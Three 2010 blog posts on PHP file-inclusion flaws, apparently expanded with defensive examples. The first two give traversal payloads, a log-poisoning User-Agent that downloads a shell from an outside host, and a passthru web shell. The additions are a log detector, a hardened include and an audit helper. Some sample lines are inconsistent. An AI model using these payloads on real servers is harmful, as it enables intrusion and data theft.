Insecure PHP Functions And Their Exploits…

May 27, 2010 at 9:14 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

I am going to list various PHP functions and their misuses along with ways to manipulate them:

require($filename);
http://localhost/?filename=/etc/passwd

require("stuff/".$filename);
http://localhost/?filename=/../../../../../etc/passwd

require("stuff/".$filename.".php");
http://localhost/?filename=/../../../../../etc/passwd%00

require("stuff/".$_COOKIE['something'].".php");
javascript:document.cookie = "something=../../../../../etc/passwd%00";

A neat little trick that lets you get a file onto the server using these LFI / RFI vulnerabilities is to poison the web server's log files (access_log / error_log). I figured the easiest way to do this was to load the Live HTTP Headers Firefox plug-in: load the LFI page in your browser, capture the request, and change the User-Agent string to PHP code of your choice. You can then browse to the log file using the LFI / RFI vulnerability, and when the page loads it will execute your PHP code. Look at these headers for instance:

Host: localhost
User-Agent: <?php system('GET http://www.example.com/phpshell/shell.txt > shell.php'); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

If you replay this using live HTTP headers it will poison the log file with:

127.0.0.1 - - [27/May/2010:21:30:17 +0100]
"GET /testing/vuln.php?COLOR=../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('GET.php'); ?>"

Then when you view the log file using the LFI / RFI it will execute the above PHP code. You can then browse to the PHP shell (shell.php) that will be located in the same directory as the LFI / RFI page 🙂

So, say we placed the following code into shell.php:

<? passthru($_GET[pwn]) ?>

Now we have that piece of code on the target, which we can reach through the following URL:

http://localhost/shell.php

To take advantage of this simple PHP shell, all we have to do is:

http://localhost/shell.php%00&pwn=cat%20/etc/passwd%00
http://localhost/shell.php%00&pwn=uname%20-a
http://localhost/shell.php%00&pwn=who
http://localhost/shell.php%00&pwn=ps%20afuuwx

Then the command output will be displayed on the page 🙂

A quick note:

%00 is a NULL
%20 is a SPACE
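From the defender's side, the poisoned request above leaves a very recognisable trace in the access log: a traversal sequence and an encoded NULL in the query string, and a PHP open tag in the User-Agent. The following is an added example (not code from the original post) that scans Apache combined-format log lines for exactly those indicators; the three log lines are constructed samples, and the script assumes PHP 7.1 or later.

```php
<?php
// Added example: flag access-log entries that carry the LFI / log-poisoning
// patterns discussed above (directory traversal, encoded NULL bytes, PHP tags
// in the User-Agent, remote URLs passed as parameters).
// The log lines below are constructed samples, not real traffic.

$sampleLog = <<<'LOG'
127.0.0.1 - - [27/May/2010:21:30:17 +0100] "GET /testing/vuln.php?COLOR=blue HTTP/1.1" 200 855 "-" "Mozilla/5.0"
127.0.0.1 - - [27/May/2010:21:30:18 +0100] "GET /testing/vuln.php?COLOR=../../../../../../etc/passwd%00 HTTP/1.1" 200 855 "-" "<?php system('id'); ?>"
127.0.0.1 - - [27/May/2010:21:30:19 +0100] "GET /testing/vuln.php?COLOR=http://www.example.com/x%00 HTTP/1.1" 200 855 "-" "Mozilla/5.0"
LOG;

// Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
const LOG_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$/';

// Indicator patterns, keyed by the label that appears in the report.
const INDICATORS = [
    'traversal'  => '/(\.\.[\/\\\\])|(%2e%2e[\/\\\\%])/i',
    'null_byte'  => '/%00|\x00/',
    'php_tag'    => '/<\?(php|=|\s)/i',
    'remote_url' => '/=(https?|ftp|php|data):\/\//i',
];

/**
 * Return a finding for one log line, or null when the line is clean
 * (or is not in combined format).
 */
function analyseLogLine(string $line): ?array
{
    if (!preg_match(LOG_RE, $line, $m)) {
        return null;
    }
    [, $host, $time, $request, $status, , , $ua] = $m;

    // Check the raw request, the URL-decoded request (so "%2e%2e/" is seen
    // as "../") and the User-Agent, since that is where the poisoned code sits.
    $fields = [
        'request'         => $request,
        'request_decoded' => rawurldecode($request),
        'user_agent'      => $ua,
    ];

    $hits = [];
    foreach (INDICATORS as $label => $re) {
        foreach ($fields as $field => $value) {
            if (preg_match($re, $value)) {
                $hits[] = "$label in $field";
            }
        }
    }
    if (!$hits) {
        return null;
    }
    return ['host' => $host, 'time' => $time, 'status' => $status,
            'request' => $request, 'hits' => array_values(array_unique($hits))];
}

foreach (explode("\n", $sampleLog) as $line) {
    if ($finding = analyseLogLine($line)) {
        printf("%s %s %s\n  -> %s\n",
            $finding['time'], $finding['host'], $finding['request'],
            implode(', ', $finding['hits']));
    }
}
```

The first sample line produces no finding; the second is reported for traversal and a NULL byte in the request and a PHP tag in the User-Agent; the third for a NULL byte and a remote URL. Run against a real access_log, the same function can be fed line by line from a file handle; a status of 200 on such a request, rather than 404, is the case worth looking at first, since it means the include actually resolved.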

Until the next time…


Playing around with Local and Remote file inclusions…

May 27, 2010 at 10:54 am (LFI / RFI, PHP, Programming, Security)

Hey all,

So with my recent research into web application security I have been playing around with local and remote file inclusions on my local web server 😉 A couple of things to note so that an LFI or RFI actually works when you try it.

1) Make sure magic quotes is off, so you're able to include said files:

; Magic quotes for incoming GET/POST/Cookie data.
magic_quotes_gpc = Off

Otherwise you will get an error similar to this when trying to include files:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

That is magic quotes kicking in; make sure you turn it off before playing with these techniques!

2) You also need to make sure allow_url_fopen and allow_url_include are set to On:

; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On

; Whether to allow include/require to open URLs (like http:// or ftp://) as fil$
allow_url_include = On

Or you will get an error that looks similar to:

Warning: include() [function.include]: URL file-access is disabled in the server configuration in /var/www/testing/vuln.php on line 5

Warning: include(http://www.google.com/) [function.include]: failed to open stream: no suitable wrapper could be found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

Now you should be able to play around with LFI/RFI with no issues; consider the following example:

root@bt:/var/www/testing# ls -l
total 16
-rw-r--r-- 1 root root 33 May 27 10:48 blue.php
-rw-r--r-- 1 root root 20 May 27 10:43 phpinfo.php
-rw-r--r-- 1 root root 32 May 27 10:48 red.php
-rw-r--r-- 1 root root 297 May 27 10:44 vuln.php
root@bt:/var/www/testing# cat vuln.php
<?php
$color = 'blue';
if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>

<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>

root@bt:/var/www/testing# cat blue.php red.php
<?php echo "testing blue..."; ?>
<?php echo "testing red..."; ?>
root@bt:/var/www/testing#

Go to: http://localhost/testing/vuln.php then play around with the form for a bit (it shouldn't take you too long, it's a very simple and contrived example 😉 ) and keep your eye on the variable in the URL bar… try things like this:

http://localhost/testing/vuln.php?COLOR=phpinfo.php
http://localhost/testing/vuln.php?COLOR=../../../../../etc/passwd%00
http://localhost/testing/vuln.php?COLOR=http://www.google.com/%00

Why the %00 on the end, you may ask?

Well, that puts a NULL at the end of the string so that PHP stops reading it at that point; otherwise something like this may happen:

Warning: include(http://www.google.com/.php) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/testing/vuln.php on line 5

Warning: include() [function.include]: Failed opening 'http://www.google.com/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/testing/vuln.php on line 5

From that it should be pretty clear why you need to append the %00. Notice the 'http://www.google.com/.php', which is constructed from:

include( $color . '.php' );

$color == http://www.google.com/ . '.php'

As the page http://www.google.com/.php does not exist, it throws an error, which is why you must append a NULL to the end of your URL/file/string/etc.
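The root cause in vuln.php is that a request parameter is concatenated straight into the include path, so anything the filesystem (or a URL wrapper) can resolve is fair game. Below is an added example, not the post's own code, of how the same page looks when written defensively: the COLOR value is only ever a key into a fixed allow-list, the resolved path is checked against the script's own directory, and array-valued or NULL-containing input is refused outright. Two caveats worth knowing: the %00 truncation the post relies on works because PHP of that era accepted NULL bytes in paths, a behaviour removed in PHP 5.3.4, and allow_url_include is Off by default, so the RFI variant only works on hosts where someone turned it on. The example assumes PHP 7 or later and the post's layout of blue.php and red.php beside the script.

```php
<?php
// Added example: a hardened counterpart to the post's vuln.php.
// User input selects from a fixed map; it never becomes part of a path.

// Permitted COLOR values and the file each one maps to. Anything else is refused.
const COLOR_FILES = [
    'blue' => 'blue.php',
    'red'  => 'red.php',
];

/**
 * Return the absolute path to include for $color, or null if the request
 * must be refused (unknown name, NULL byte, or a path outside $baseDir).
 */
function resolveColorInclude(string $color, string $baseDir): ?string
{
    // A NULL byte is never part of a legitimate value. Modern PHP rejects such
    // paths itself, but checking here keeps the intent visible in the code.
    if (strpos($color, "\0") !== false) {
        return null;
    }
    // Allow-list lookup: "../../etc/passwd" is simply not a key in the map.
    if (!array_key_exists($color, COLOR_FILES)) {
        return null;
    }
    // Belt and braces: realpath() resolves ../ and symlinks, and the result
    // must still sit inside the intended directory.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . COLOR_FILES[$color]);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$color = 'blue';
// is_string() rejects COLOR[]=... style input, which would otherwise arrive as an array.
if (isset($_GET['COLOR']) && is_string($_GET['COLOR'])) {
    $color = $_GET['COLOR'];
}

$file = resolveColorInclude($color, __DIR__);
if ($file === null) {
    http_response_code(400);
    echo 'Unknown colour.';
} else {
    include $file;
}
?>

<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
```

With this in place the three URLs from the post (phpinfo.php, ../../../../../etc/passwd%00, http://www.google.com/%00) all get a 400 instead of an include. On the server side, keeping allow_url_include = Off in php.ini is the single setting that removes the RFI case entirely regardless of what the application code does.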


Vulnerable PHP Functions…

May 26, 2010 at 2:06 pm (LFI / RFI, PHP, Programming, Security)

Hey all,

Just a quick note, here is a list of vulnerable PHP functions that you should look out for in your web apps:

Local / Remote file inclusion bugs:

include()
include_once()
require()
require_once()

Local / Remote command execution bugs:

eval()
preg_replace()
fwrite()
passthru()
file_get_contents()
shell_exec()
system()

SQL Injection bugs:

mysql_query()

File / File system bugs:

fopen()
readfile()
glob()
file()
popen()
exec()

For auditing PHP-based applications grep is pretty good; however, the ultimate tool is PHPXRef, which you can check out here.
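Grepping for the names above works but is noisy (it matches comments, strings and `$file` variables just as happily as calls). As an added example, not from the original post or from PHPXRef, here is a small triage helper that uses PHP's own tokenizer to list only real calls to the listed functions, with the line number and the argument text, so a reviewer can go straight to tracing where each argument comes from. The code being scanned is a constructed sample string; in use you would pass file contents read from disk. It assumes PHP 7 or later.

```php
<?php
// Added example: tokenizer-based audit helper for the function list above.
// It reports call sites only; every hit still needs a human to decide whether
// the argument is attacker-controlled.

const WATCHED = [
    // Local / remote file inclusion
    'include', 'include_once', 'require', 'require_once',
    // Command execution / code evaluation
    'eval', 'preg_replace', 'passthru', 'shell_exec', 'system', 'exec', 'popen',
    // File / file system and data access
    'fwrite', 'file_get_contents', 'fopen', 'readfile', 'glob', 'file',
    // SQL
    'mysql_query',
];

/** Index of the next non-whitespace token after $i, or null at end of input. */
function nextSignificant(array $tokens, int $i): ?int
{
    for ($j = $i + 1, $n = count($tokens); $j < $n; $j++) {
        if (!is_array($tokens[$j]) || $tokens[$j][0] !== T_WHITESPACE) {
            return $j;
        }
    }
    return null;
}

/** Source text from token $from up to the end of the statement (";" at paren depth 0). */
function argumentText(array $tokens, int $from): string
{
    $text = '';
    $depth = 0;
    for ($j = $from, $n = count($tokens); $j < $n; $j++) {
        $piece = is_array($tokens[$j]) ? $tokens[$j][1] : $tokens[$j];
        if ($piece === '(') { $depth++; }
        if ($piece === ')') { $depth--; }
        if ($piece === ';' && $depth <= 0) { break; }
        $text .= $piece;
    }
    return trim($text);
}

/** Return [['line' => int, 'name' => string, 'args' => string], ...] for $source. */
function findWatchedCalls(string $source): array
{
    $tokens = token_get_all($source);
    $found = [];
    foreach ($tokens as $i => $t) {
        if (!is_array($t)) {
            continue;
        }
        // include/require/eval are language constructs with their own token ids
        // and need no parentheses; ordinary functions are a T_STRING followed by "(".
        $isConstruct = in_array($t[0], [T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE, T_EVAL], true);
        $next = nextSignificant($tokens, $i);
        $isCall = $t[0] === T_STRING && $next !== null && $tokens[$next] === '(';
        $name = strtolower($t[1]);
        if (($isConstruct || $isCall) && in_array($name, WATCHED, true)) {
            $found[] = ['line' => $t[2], 'name' => $name, 'args' => argumentText($tokens, $i + 1)];
        }
    }
    return $found;
}

// Constructed sample: the post's vuln.php pattern plus two other call types.
$sample = <<<'PHP'
<?php
$color = $_GET['COLOR'];
include( $color . '.php' );
echo htmlspecialchars($color);
passthru($_GET['cmd']);
$rows = mysql_query("SELECT * FROM t WHERE id = " . $_GET['id']);
PHP;

foreach (findWatchedCalls($sample) as $hit) {
    printf("line %d: %s %s\n", $hit['line'], $hit['name'], $hit['args']);
}
```

On the sample this reports the include on line 3, the passthru on line 5 and the mysql_query on line 6, and stays silent on the htmlspecialchars call, which a plain grep for the list would not distinguish from anything else. Because token_get_all only tokenizes, the scanned file is never executed, so it is safe to run over untrusted code.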
